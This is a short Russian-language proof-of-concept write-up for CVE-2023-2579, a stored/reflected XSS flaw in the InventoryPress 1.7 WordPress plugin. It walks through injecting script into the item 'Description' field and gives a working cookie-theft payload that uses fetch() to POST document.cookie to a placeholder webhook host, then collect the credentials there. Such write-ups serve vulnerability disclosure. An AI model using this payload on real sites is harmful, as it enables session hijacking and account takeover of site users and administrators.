
PoC для CVE-2023-2579
Идентификатор CVE-2023-2579 был зарезервирован, и PoC был опубликован на сайте WPScan: https://wpscan.com/vulnerability/3cfcb8cc-9c4f-409c-934f-9f3f043de6fe
Название: Аутентифицированная отраженная межсайтовая скриптовая уязвимость (Reflected XSS) в плагине InventoryPress для CMS WordPress
Дата: 2023-04-21
Автор: Danilo Albuquerque
Сайт разработчика: https://wordpress.org
Ссылка на ПО: https://wordpress.org/download
Версия: WordPress 6.2
Название и версия плагина: InventoryPress 1.7
Протестировано на: Brave (Версия 1.50.119 Chromium: 112.0.5615.121 (Официальная версия) 64 бита)
После выполнения всех этих действий и обновления текущей страницы появится всплывающее окно с предупреждением и сообщением в нем.
Перейдите на страницу, где можно добавить элементы в инвентарь:

Добавьте вредоносную полезную нагрузку в поле ввода "Описание" формы:

Откройте ссылку на новый элемент, созданную плагином:

После выполнения запроса отображается всплывающее окно с предупреждением:

Добавьте следующую полезную нагрузку для кражи cookie в поле ввода "Описание": <script>fetch('https://webhooksite-to-get-the-request', {method: 'POST',mode: 'no-cors',body:document.cookie});</script>. Затем опубликуйте новый элемент или обновите существующий;
Запустите и получите учетные данные на сайте Webhook
Добавление полезной нагрузки и публикация элемента (или его обновление):

Запуск и получение учетных данных:
